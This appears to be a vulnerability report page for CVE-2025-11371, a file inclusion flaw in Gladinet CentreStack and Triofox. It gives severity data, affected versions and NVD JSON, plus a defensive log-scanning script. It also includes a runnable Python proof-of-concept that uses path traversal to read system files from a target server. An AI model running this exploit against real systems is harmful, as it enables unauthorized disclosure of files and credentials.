Security Vulnerability Report
CVE-2025-11371 CVSS 7.5 HIGH

CVE-2025-11371

Published: 2025-10-09 17:15:59
Last Modified: 2025-11-05 14:32:01
Source: 5dacb0b8-2277-4717-899c-254586fe4912

Description

In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: all versions prior to and including 16.7.10368.56560.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:* - VULNERABLE
Gladinet CentreStack <= 16.7.10368.56560
Gladinet Triofox <= 16.7.10368.56560

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11371 - Gladinet CentreStack/Triofox Unauthenticated LFI PoC
# Exploits Local File Inclusion to read arbitrary system files
# Affected: All versions <= 16.7.10368.56560
import requests
import sys

TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-centrestack.local"
FILE_TO_READ = sys.argv[2] if len(sys.argv) > 2 else "..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"


def exploit_lfi(target, file_path):
    """
    Send unauthenticated request to exploit the LFI vulnerability
    in Gladinet CentreStack/Triofox default installation.
    """
    # Construct the malicious URL with path traversal payload
    url = f"{target}/portal/loginpage.aspx?redirect={file_path}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    }
    try:
        response = requests.get(url, headers=headers, timeout=10, verify=False)
        if response.status_code == 200 and len(response.text) > 0:
            print(f"[+] LFI successful! Contents of {file_path}:")
            print("-" * 60)
            print(response.text)
            print("-" * 60)
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET}")
    print(f"[*] Attempting to read: {FILE_TO_READ}")
    exploit_lfi(TARGET, FILE_TO_READ)
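As an added defensive example (not part of this CVE record or of the vendor's code), the block below flags IIS W3C log lines whose query string carries a path-traversal sequence, decoding twice so double-encoded attempts are also caught, and checks whether a build number is at or below the last affected version named above using numeric rather than string comparison. The endpoint and parameter names are taken from the PoC on this page; the log field order and the sample lines are constructed assumptions.

```python
from urllib.parse import unquote
import re

LAST_AFFECTED = "16.7.10368.56560"  # last affected build named in the record

# ../ or ..\ in plain or still-encoded form, tested after decoding twice
TRAVERSAL_RE = re.compile(r"\.\.(?:[\\/]|%5c|%2f)", re.IGNORECASE)

def version_tuple(v):
    """Numeric, field-by-field comparison; plain string order would wrongly
    rank 16.10.x below 16.7.x."""
    return tuple(int(x) for x in v.split("."))

def is_affected(version, last_affected=LAST_AFFECTED):
    """True when version <= last affected build."""
    return version_tuple(version) <= version_tuple(last_affected)

def decode_query(query):
    """Decode twice so double-encoded traversal (%252e%252e%252f) is exposed."""
    return unquote(unquote(query))

def has_traversal(query):
    return TRAVERSAL_RE.search(decode_query(query)) is not None

def parse_iis_line(line):
    """Minimal W3C parser for the constructed field order used below:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    f = line.split()
    if line.startswith("#") or len(f) < 7:
        return None
    return {"ip": f[2], "method": f[3], "stem": f[4], "query": f[5], "status": f[6]}

def find_suspicious(lines):
    """Return (client ip, uri stem, decoded query) for traversal attempts."""
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec and rec["query"] != "-" and has_traversal(rec["query"]):
            hits.append((rec["ip"], rec["stem"], decode_query(rec["query"])))
    return hits

# Constructed sample lines (IIS W3C format, reduced field set); not real captures
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2025-10-10 08:01:02 203.0.113.7 GET /portal/loginpage.aspx redirect=..%5c..%5c..%5cwindows%5cwin.ini 200",
    "2025-10-10 08:01:05 198.51.100.4 GET /portal/loginpage.aspx redirect=%2fportal%2fhome.aspx 302",
    "2025-10-10 08:02:11 203.0.113.7 GET /portal/loginpage.aspx redirect=%252e%252e%252f%252e%252e%252fweb.config 200",
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("traversal in query:", hit)
```

Lines with a legitimate relative redirect (the second sample) produce no hit, while the plain and double-encoded traversal attempts both do.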

References

https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw (Exploit, Third Party Advisory)
https://www.centrestack.com/p/gce_latest_release.html (Release Notes)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-11371 (US Government Resource)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11371",
    "sourceIdentifier": "5dacb0b8-2277-4717-899c-254586fe4912",
    "published": "2025-10-09T17:15:58.507",
    "lastModified": "2025-11-05T14:32:00.610",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. \n\nThis issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "cisaExploitAdd": "2025-11-04",
    "cisaActionDue": "2025-11-25",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability",
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-552"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "16.10.10408.56683",
                "matchCriteriaId": "E558139A-6A80-4BAA-8786-15E5AFCA9C37"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "16.7.10368.56560",
                "matchCriteriaId": "A8D9B616-FF33-4FF0-A97C-4C0B134E7B40"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw",
        "source": "5dacb0b8-2277-4717-899c-254586fe4912",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.centrestack.com/p/gce_latest_release.html",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-11371",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["US Government Resource"]
      }
    ]
  }
}